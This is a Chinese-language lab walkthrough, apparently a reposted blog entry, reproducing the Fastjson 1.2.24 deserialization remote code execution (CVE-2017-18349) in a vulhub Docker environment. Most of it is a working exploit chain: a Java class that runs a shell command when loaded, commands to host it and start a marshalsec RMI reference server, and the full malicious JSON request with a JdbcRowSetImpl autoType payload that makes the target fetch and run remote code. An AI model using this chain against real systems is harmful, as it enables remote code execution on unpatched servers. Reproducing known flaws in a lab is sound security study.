概述
声明
好好学习,天天向上
漏洞描述
CVE-2017-18349,前台无回显RCE
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
影响范围
fastjson<=1.2.24
复现过程
这里使用1.2.24版本
使用vulhub
cd /app/vulhub-20201028/fastjson/1.2.24-rce
使用docker启动
docker-compose up -d
拉镜像以后,访问IP:8090
访问,可看到json格式输出
http://192.168.239.129:8090
新建一个TouchFile.java,并编译成class文件
javac TouchFile.java
文件内容
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/cve-2017-18349"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
使用python开启站点
python -m SimpleHTTPServer 1111
192.168.239.139:1111/TouchFile.class
然后借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class:(marshalsec-0.0.3-SNAPSHOT-all.jar需要下载,编译,特别坑)
安装marshalsec,mvn也是需要安装的,不过这个很简单,和java一模一样
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
装好后运行
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.239.139:1111/#TouchFile" 9999
发送请求包
POST / HTTP/1.1
Host: 192.168.239.129:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 274
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.239.139:9999/TouchFile",
"autoCommit":true
}
}
docker-compose常用命令
拉镜像(进入到vulhub某个具体目录后)
docker-compose build
docker-compose up -d
镜像查询(查到的第一列就是ID值)
docker ps -a
进入指定镜像里面(根据上一条查出的ID进入)
docker exec -it ID /bin/bash
关闭镜像(每次用完后关闭)
docker-compose down
最后
以上就是大力猫咪为你收集整理的Fastjson 1.2.24 反序列化(CVE-2017-18349)的全部内容,希望文章能够帮你解决Fastjson 1.2.24 反序列化(CVE-2017-18349)所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复